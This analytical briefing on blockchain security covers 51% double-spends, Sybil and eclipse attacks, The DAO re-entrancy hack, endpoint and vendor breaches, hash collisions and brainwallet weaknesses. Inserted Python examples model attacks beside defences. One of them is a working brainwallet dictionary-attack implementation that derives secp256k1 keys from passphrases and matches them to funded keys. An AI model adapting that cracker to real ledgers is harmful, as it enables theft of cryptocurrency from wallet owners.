Blockchain’s cybersecurity needs greater attention
Cybersecurity attacks against cryptocurrencies raise tough questions for the underlying blockchain technology
Coinbase, a major US-based cryptocurrency exchange, today temporarily halted trading in Ethereum Classic (ETC) after detecting a cybersecurity attack on the ETC blockchain itself. The attack once again cast doubt over the potential of blockchain, a leading form of distributed ledger technology, to revolutionise industry.
What next
Blockchain technology has strong security properties by design: its history is tamper-evident and no single party has to be trusted, which makes it more robust than most alternative ledger technologies. However, like all technology, it has important cybersecurity vulnerabilities, in the protocol, in the applications built on it and in the systems around it, and criminals repeatedly exploit them to steal cryptocurrency. The industry's understanding of these vulnerabilities, and of how to mitigate them, is growing, but more slowly than the application of blockchain in sensitive areas such as voting.
Subsidiary Impacts
- Cybersecurity attacks against cryptocurrency exchanges fuel investor scepticism about digital tokens, already seen as speculative bubbles.
- International standards for blockchain developers will have limited impact on security as these standards are not legally mandatory.
- Energy intensity of proof-of-work blockchains is their greatest weakness.
Analysis
Because blockchain promises faster and cheaper settlement between parties that lack a trusted intermediary, the technology is being adopted widely (see CHINA: Firms expect bright future for blockchain - August 9, 2018 and see INTERNATIONAL: Blockchain will aid energy efficiencies - July 9, 2018):
- PwC's 2018 Global Blockchain Survey showed 84% of the executives it surveyed are "actively involved" in adopting blockchain.
- Companies such as FedEx are using blockchain for supply chain management while several food companies including Nestle, Unilever and Walmart have partnered with IBM to create a blockchain to monitor food safety.
- De Beers is using a blockchain platform to trace diamonds from mine to retailer.
Over coming years, growing use of smart contracts could transform record-keeping and transactions in areas ranging from medical records to land registries.
Key types of attacks
Blockchain technology has multiple cybersecurity vulnerabilities.
51% attacks
An attacker who controls a majority of a network's mining power (commonly described as 51%, though any share larger than that of all honest miners combined suffices) can mine a private chain faster than the public one, then publish it so that nodes adopt it and discard the recent public blocks. Transactions in the discarded blocks are reversed, which lets the attacker spend the same tokens twice: once on the chain an exchange saw and credited, and again on the chain that replaces it. Such an attacker cannot forge other users' signatures or spend coins it does not hold; the damage is limited to reversing recent transactions and censoring new ones, which is why exchanges raise the number of confirmations they require on chains whose hash rate is small or cheap to rent.
In May 2018, attackers used a 51% attack against Bitcoin Gold to double-spend some 18 million dollars' worth of coins deposited at exchanges. Other cryptocurrencies, including Verge, Monacoin, ZenCash and Litecoin Cash, suffered similar attacks around the same time, and Electroneum was hit in April 2018.
Today's attack on Ethereum Classic is believed to be a 51% attack; Coinbase, as a venue where double-spent coins could be cashed out, is a victim of the chain's weakness rather than its source.
Payments network Dash says it is developing a mechanism that would make its blockchain resistant to such attacks.
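The confirmation policy mentioned above can be derived rather than guessed. The following is an added example, not code from the original briefing or from any exchange: it implements Nakamoto's estimate (from the Bitcoin white paper) of the probability that an attacker holding a fraction q of the hash rate overtakes the honest chain after a payment has z confirmations, and uses it to pick a confirmation count per coin. The hash-rate shares in the usage section are constructed assumptions, not measurements of any real network.

```python
import math


def attacker_success_probability(q: float, z: int) -> float:
    """Probability that an attacker holding fraction q of the total hash rate
    eventually overtakes the honest chain once a payment has z confirmations.

    Nakamoto's estimate: while the honest chain mines z blocks, the attacker's
    private chain gains a Poisson-distributed number of blocks with mean z*q/p,
    and from a deficit of d blocks the attacker catches up with probability (q/p)**d.
    """
    if not 0.0 <= q < 1.0 or z < 0:
        raise ValueError("q must be in [0, 1) and z must be non-negative")
    p = 1.0 - q
    if q >= p:
        # Majority attacker (the 51% case): the private chain grows faster than
        # the public one, so it overtakes it with certainty however deep the
        # payment is buried. No confirmation count is safe.
        return 1.0
    ratio = q / p
    lam = z * ratio
    poisson = math.exp(-lam)          # P(attacker has mined 0 blocks so far)
    prob_honest_wins = 0.0
    for k in range(z + 1):
        if k > 0:
            poisson *= lam / k        # advance the Poisson pmf to k blocks
        # Attacker is z-k blocks behind and never catches up from there.
        prob_honest_wins += poisson * (1.0 - ratio ** (z - k))
    return 1.0 - prob_honest_wins


def confirmations_needed(q: float, max_risk: float = 0.001, limit: int = 10_000):
    """Smallest confirmation count z at which the attacker's success probability
    drops below max_risk, or None when no finite z works (q >= 0.5)."""
    if q >= 0.5:
        return None
    for z in range(limit):
        if attacker_success_probability(q, z) < max_risk:
            return z
    return None


def exchange_policy(hash_share_estimates: dict, max_risk: float = 0.001) -> dict:
    """Confirmation requirement per coin, given an estimate of how much of each
    network's hash rate a well-funded attacker could control or rent."""
    return {coin: confirmations_needed(q, max_risk)
            for coin, q in hash_share_estimates.items()}


if __name__ == "__main__":
    # Constructed hash-share estimates for illustration only.
    policy = exchange_policy({"large-chain": 0.10, "mid-chain": 0.30, "rentable-chain": 0.55})
    for coin, z in policy.items():
        print(coin, "->", f"{z} confirmations" if z is not None else "no safe depth; suspend deposits")
```

The point of the last line of output is the practical lesson of a 51% attack: once the attacker's share reaches half, the loop in `confirmations_needed` never terminates with a safe value, so the only defence is to stop crediting deposits on that chain.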
Sybil attack
A 'Sybil attack' involves a single malicious actor creating many online identities. If the network accepts these identities as independent nodes, the actor can control a large share of the peers that honest nodes connect to without alerting other miners, and can then isolate ('eclipse') those nodes, feed them a false view of the chain, delay or censor their transactions, or link transactions to their IP addresses. In a proof-of-work system this does not by itself let the attacker rewrite the ledger, since influence over consensus is weighted by mining power rather than by number of nodes, but it is often the first stage of a larger fraud.
For example, the activities of China-based cryptocurrency exchange FCoin on the Ethereum network in July 2018 were widely described as a Sybil attack.
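Because Sybil identities are cheap, peer-to-peer networks defend against them by capping the influence any one source can have rather than by trying to detect fake identities. The following added example (not code from the original briefing, and a simplified model rather than any real client's implementation) contrasts a naive peer-selection policy with one that allows at most one outbound connection per /16 network group, a heuristic loosely modelled on the netgroup diversity rule that Bitcoin Core applies when choosing outbound peers. The address table is constructed: the Sybil operator floods it with 200 addresses from one block it controls.

```python
import ipaddress


def netgroup(ip: str) -> str:
    """Coarse identity of an address owner: its /16 for IPv4. Registering many
    identities is free; controlling addresses in many distinct /16s is not."""
    addr = ipaddress.ip_address(ip)
    if addr.version != 4:
        raise ValueError("IPv4 only in this example")
    return str(ipaddress.ip_network(f"{ip}/16", strict=False))


def select_first_n(candidates, slots):
    """Naive policy: fill outbound slots with the first advertised addresses."""
    return candidates[:slots]


def select_netgroup_diverse(candidates, slots):
    """Hardened policy: at most one outbound peer per /16, so occupying every
    slot requires a presence in `slots` distinct networks."""
    chosen, used = [], set()
    for ip in candidates:
        group = netgroup(ip)
        if group in used:
            continue
        chosen.append(ip)
        used.add(group)
        if len(chosen) == slots:
            break
    return chosen


def attacker_fraction(peers, attacker_ips) -> float:
    """Share of a node's outbound peers that the attacker controls."""
    return sum(ip in attacker_ips for ip in peers) / len(peers)


# Constructed address table (RFC 5737 / private ranges, no real hosts).
ATTACKER_IPS = {f"198.51.100.{i}" for i in range(1, 201)}     # one /24, 200 Sybils
HONEST_IPS = ["203.0.113.5", "192.0.2.9", "100.64.1.1", "172.16.0.7",
              "10.1.2.3", "192.168.5.5", "10.2.0.1", "172.20.3.3"]  # distinct /16s


def simulate(slots: int = 8):
    """Return (attacker share under naive policy, attacker share under diverse policy)."""
    candidates = sorted(ATTACKER_IPS) + HONEST_IPS   # the flood arrives first
    naive = select_first_n(candidates, slots)
    diverse = select_netgroup_diverse(candidates, slots)
    return attacker_fraction(naive, ATTACKER_IPS), attacker_fraction(diverse, ATTACKER_IPS)


if __name__ == "__main__":
    naive_share, diverse_share = simulate()
    print(f"naive policy: attacker holds {naive_share:.0%} of outbound slots")
    print(f"netgroup-diverse policy: attacker holds {diverse_share:.0%} of outbound slots")
```

With the naive policy the attacker eclipses the node completely; with the diverse policy the same 200 identities buy a single slot, and the attacker would need addresses in eight separate /16 blocks to do the same damage.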
Implementation vulnerabilities
Other vulnerabilities lie not in the blockchain protocol itself but in the applications built on top of it, which are only as secure as their own code.
The DAO hack
In June 2016, an attacker drained around 3.6 million Ether, then worth some 50 million dollars, from 'The DAO', an application built on the Ethereum blockchain that used a smart contract to make investment decisions in a decentralised and automated way.
The attacker exploited a re-entrancy flaw in the contract's code: the withdrawal function sent Ether to the caller before it updated the caller's recorded balance, and the attacker's receiving contract called the withdrawal function again from inside that transfer, so the same balance was paid out many times within a single transaction.
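The re-entrancy pattern behind The DAO drain, and the fix, can be seen in a small model. The following is an added example, not The DAO's actual Solidity code: a Python vault reproduces the vulnerable ordering (send first, update balance afterwards) beside a hardened version that applies the checks-effects-interactions ordering and a re-entrancy mutex. The account objects stand in for Ethereum contracts, and `receive()` plays the role of the recipient's fallback function; the balances are constructed.

```python
class VulnerableVault:
    """Models The DAO's withdrawal flaw: Ether is sent to the caller before the
    caller's balance is zeroed, so code running in the recipient can re-enter
    withdraw() while its balance still reads as unspent."""

    def __init__(self):
        self.balances = {}   # account -> balance the contract believes it owes
        self.ether = 0       # Ether the contract actually holds

    def deposit(self, account, amount):
        self.balances[account] = self.balances.get(account, 0) + amount
        self.ether += amount

    def withdraw(self, account):
        amount = self.balances.get(account, 0)
        if amount == 0 or self.ether < amount:
            return
        self.ether -= amount
        # Interaction before effect. In Solidity this was a low-level
        # msg.sender.call.value(amount)(), which hands control to the recipient.
        account.receive(self, amount)
        self.balances[account] = 0           # effect applied too late


class HardenedVault(VulnerableVault):
    """Checks-effects-interactions ordering plus a re-entrancy mutex."""

    def __init__(self):
        super().__init__()
        self._entered = False

    def withdraw(self, account):
        if self._entered:
            raise RuntimeError("re-entrant call rejected")   # like a failed require()
        amount = self.balances.get(account, 0)
        if amount == 0 or self.ether < amount:
            return
        self.balances[account] = 0           # effect first
        self.ether -= amount
        self._entered = True
        try:
            account.receive(self, amount)    # interaction last
        finally:
            self._entered = False


class HonestUser:
    def __init__(self):
        self.received = 0

    def receive(self, vault, amount):
        self.received += amount


class ReentrantAttacker:
    """Its fallback re-enters withdraw() for as long as the vault keeps paying."""

    def __init__(self):
        self.received = 0

    def receive(self, vault, amount):
        self.received += amount
        try:
            vault.withdraw(self)
        except RuntimeError:
            pass   # a failed low-level call just returns false to the caller


def run_attack(vault_cls, victims_total=100, attacker_stake=10):
    """Deposit constructed balances, let the attacker withdraw once, and report
    (Ether the attacker ended up with, Ether left in the vault)."""
    vault = vault_cls()
    victims, attacker = HonestUser(), ReentrantAttacker()
    vault.deposit(victims, victims_total)
    vault.deposit(attacker, attacker_stake)
    vault.withdraw(attacker)
    return attacker.received, vault.ether


if __name__ == "__main__":
    print("vulnerable vault (attacker got, vault left):", run_attack(VulnerableVault))
    print("hardened vault   (attacker got, vault left):", run_attack(HardenedVault))
```

Against the vulnerable vault a 10-unit stake drains all 110 units, because each nested call sees the same unspent balance; against the hardened vault the attacker receives only its own 10 units, since the balance is zeroed before the transfer and the mutex rejects the nested call outright.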
Endpoint vulnerabilities
Endpoint vulnerabilities lie in the devices individuals use to access the blockchain. If those endpoints are weak, for example through unpatched operating systems such as Windows or Android or malware on the device, the private keys and data handled there can be stolen however secure the chain itself is.
In December 2017, hackers stole about 78 million dollars' worth of bitcoin from the cryptocurrency mining marketplace NiceHash after compromising an employee's computer, which gave them access to the company's systems and let them drain bitcoin from its wallet.
Vendor risks
Ensuring safety throughout the technological supply chain is critical
Many third-party vendors produce blockchain-based technologies, which become a source of vulnerability if the vendors do not follow secure development and operational practices.
Risks arise if a vendor's code is flawed, if its own internal systems are insecure, or if it harbours malicious insiders.
Blockchain vendors often handle large amounts of client data that must be moved into and out of the blockchain, and custodial vendors also hold their clients' private keys. A vendor breach can therefore expose client information or funds, which makes supply chain cybersecurity essential.
For example, in April 2016 the cryptocurrency exchange ShapeShift had about 130,000 dollars in bitcoin stolen from its hot wallet by an insider, who later sold access details to another hacker who carried out a further attack on the company.
Encryption vulnerabilities and user behaviour
Vulnerabilities in the underlying cryptography are another challenge.
One theoretical issue is hash collisions. Hashing is a cryptographic technique applied to every transaction and block on the blockchain. A collision occurs when two different inputs to a hash function produce the same output.
Because the input to a hash function can be of any length while the output has a fixed, much shorter length, collisions must exist in principle. For a sound 256-bit function such as SHA-256, however, finding one takes on the order of 2^128 evaluations (the 'birthday bound'), which is far out of reach; collisions become a practical risk only where a weak or broken function such as MD5 or SHA-1 is used.
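The birthday bound above is easy to see at work on a deliberately shortened hash. The following added example (not code from the original briefing) searches for a collision in SHA-256 truncated to a chosen number of bits, so that the effect the text describes actually appears within seconds, and computes how many inputs a collision search needs at full width. The inputs 'tx-0', 'tx-1', ... are constructed stand-ins for transactions.

```python
import hashlib
import math


def truncated_sha256(data: bytes, bits: int) -> int:
    """Top `bits` bits of SHA-256(data), standing in for a short hash function."""
    digest = int.from_bytes(hashlib.sha256(data).digest(), "big")
    return digest >> (256 - bits)


def find_collision(bits: int):
    """Birthday search over distinct inputs until two map to the same truncated
    hash. By the pigeonhole principle 2**bits + 1 inputs always suffice; on
    average about sqrt(pi/2 * 2**bits) do. Returns (input_a, input_b, inputs_tried)."""
    seen = {}
    for i in range(2 ** bits + 1):
        msg = f"tx-{i}".encode()
        h = truncated_sha256(msg, bits)
        if h in seen:
            return seen[h], msg, i + 1
        seen[h] = msg
    raise AssertionError("unreachable: pigeonhole guarantees a collision")


def expected_inputs_for_collision(bits: int) -> float:
    """Expected number of random inputs before the first collision."""
    return math.sqrt(math.pi / 2 * 2.0 ** bits)


def collision_probability(n_inputs: int, bits: int) -> float:
    """Probability that n random inputs contain at least one collision
    (standard birthday approximation 1 - exp(-n^2 / 2N))."""
    return 1.0 - math.exp(-(n_inputs ** 2) / (2.0 * 2.0 ** bits))


if __name__ == "__main__":
    a, b, tried = find_collision(24)
    print(f"24-bit collision after {tried} inputs: {a!r} and {b!r} both hash to "
          f"{truncated_sha256(a, 24):06x}")
    print(f"expected inputs for a 24-bit collision: {expected_inputs_for_collision(24):.0f}")
    print(f"expected inputs for a 256-bit collision: {expected_inputs_for_collision(256):.2e}")
    print(f"P(collision among 1e9 SHA-256 hashes): {collision_probability(10**9, 256):.1e}")
```

A 24-bit hash falls to a few thousand inputs, a 32-bit one to a few tens of thousands, while the full 256-bit output needs roughly 4 x 10^38 inputs: the collision risk the text describes is real for short or broken hashes and negligible for the functions blockchains actually use.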
If an attacker can reproduce someone else's private key, they can sign transactions from that person's wallet and steal its funds.
A properly generated 256-bit key cannot be guessed, but two users can end up with the same key, or an attacker can reproduce it, when the key is derived from too little randomness, for instance from a faulty random-number generator or from a phrase a human chose.
User behaviour is a major challenge in this regard: some people create their private keys with a 'brainwallet', software that derives the key by hashing a passphrase the user has devised.
In what is known as a 'dictionary attack', an attacker hashes large lists of common passwords, phrases and quotations, treats each hash as a candidate private key, derives the corresponding address and checks the ledger for funds; any wallet whose passphrase appears in such a list is drained, often within minutes of being funded.
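The following added example (not code from the original briefing or from any real attack tool) carries the dictionary attack through end to end: it derives a brainwallet private key as SHA-256 of the passphrase, computes the secp256k1 public key with a small pure-Python implementation of the curve, and looks the result up in an index of funded keys. A real attacker indexes Bitcoin addresses (Base58Check of RIPEMD-160(SHA-256(public key))) taken from the ledger; to keep the example self-contained it is keyed by compressed public key instead, and the 'funded' index, the victim's passphrase and the word list are constructed.

```python
import hashlib

# secp256k1 domain parameters (the curve used by Bitcoin and Ethereum).
_P = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFC2F
_N = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141
_G = (0x79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798,
      0x483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8)


def _point_add(p1, p2):
    """Affine point addition on y^2 = x^3 + 7 over GF(_P); None is the identity."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2 and (y1 + y2) % _P == 0:
        return None
    if p1 == p2:
        lam = 3 * x1 * x1 * pow(2 * y1, -1, _P) % _P
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, _P) % _P
    x3 = (lam * lam - x1 - x2) % _P
    return x3, (lam * (x1 - x3) - y1) % _P


def _scalar_mult(k, point):
    """Double-and-add; not constant-time, which is fine for an attacker's search."""
    result, addend = None, point
    while k:
        if k & 1:
            result = _point_add(result, addend)
        addend = _point_add(addend, addend)
        k >>= 1
    return result


def brainwallet_private_key(passphrase: str) -> int:
    """Classic brainwallet derivation: private key = SHA-256(passphrase)."""
    return int.from_bytes(hashlib.sha256(passphrase.encode("utf-8")).digest(), "big")


def compressed_public_key(private_key: int) -> str:
    """33-byte SEC-compressed public key as lowercase hex."""
    if not 1 <= private_key < _N:
        raise ValueError("private key out of range")
    x, y = _scalar_mult(private_key, _G)
    return ("02" if y % 2 == 0 else "03") + f"{x:064x}"


def dictionary_attack(wordlist, funded_keys):
    """Hash each candidate phrase, derive its public key and look it up in the
    index of funded keys. Returns (phrase, label, private_key) for every hit."""
    hits = []
    for phrase in wordlist:
        priv = brainwallet_private_key(phrase)
        if not 1 <= priv < _N:          # astronomically rare, but invalid as a key
            continue
        pub = compressed_public_key(priv)
        if pub in funded_keys:
            hits.append((phrase, funded_keys[pub], priv))
    return hits


# Constructed scenario: one victim used a famous passphrase; the attacker's
# index of funded keys is built from the ledger (here, constructed directly).
VICTIM_PHRASE = "correct horse battery staple"
FUNDED_KEYS = {compressed_public_key(brainwallet_private_key(VICTIM_PHRASE)): "victim wallet"}
WORDLIST = ["password", "123456", "letmein", "to be or not to be",
            "correct horse battery staple", "bitcoin is awesome"]


def run_attack():
    return dictionary_attack(WORDLIST, FUNDED_KEYS)


if __name__ == "__main__":
    for phrase, label, priv in run_attack():
        print(f"{label}: passphrase {phrase!r} -> private key {priv:064x}")
```

Nothing in the chain is broken here: the attacker simply regenerates the key exactly as the victim's software did. The same code with a real address index and a multi-gigabyte phrase list is what drains brainwallets in practice, which is why keys should come from a cryptographic random-number generator rather than from anything a person can remember.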
In February 2014, Mt. Gox, a Japanese exchange that at its peak handled around 70% of all bitcoin trading, collapsed after some 850,000 bitcoins, then worth about 450 million dollars, were found to have been stolen over several years from its hot wallet, the online wallet whose private keys were kept on internet-connected systems.
Quantum computing risks
Although still far from being built at useful scale, a quantum computer running Shor's algorithm could recover a private key from any public key that has appeared on chain, breaking the signature schemes (such as ECDSA) that control funds; hash-based proof of work is less exposed, as quantum search offers only a quadratic speed-up (see INT: Quantum computing revolution is far off - July 23, 2018). Research into quantum-resistant signature schemes for blockchains is at an early stage.
Outlook
International standards for blockchain may emerge in 2021
Awareness of the cybersecurity vulnerabilities of blockchain has only recently started to gain traction:
- The International Organization for Standardization is reportedly planning to release standards for blockchain developers by 2021.
- Prominent technology firms such as McAfee are beginning to track security problems with this technology.
Even so, the nature of the cyber products industry is unlikely to change: most developers release minimum viable products without extended testing, and the ecosystem is dominated by less well resourced small firms and start-ups, especially in lucrative areas such as cryptocurrencies.
Controversial applications
Despite these unresolved issues, some governments are looking to use blockchain for voting, including some US states, South Korea and Thailand. The US state of West Virginia allowed overseas military voters to cast ballots through a blockchain-based mobile app in the November 2018 midterm elections, a first in a US federal election.
The belief is that this will be more secure and transparent than existing forms of internet voting (such as the system Estonia has used since 2005). However, this may not be the case: a blockchain only protects the record of votes once they reach it, while the voter's device, the app and the identity checks in front of it remain attackable, so sophisticated hackers (especially foreign state-backed ones) could engage in large-scale voting fraud. Yet, underestimating the risks, some governments may adopt the technology regardless.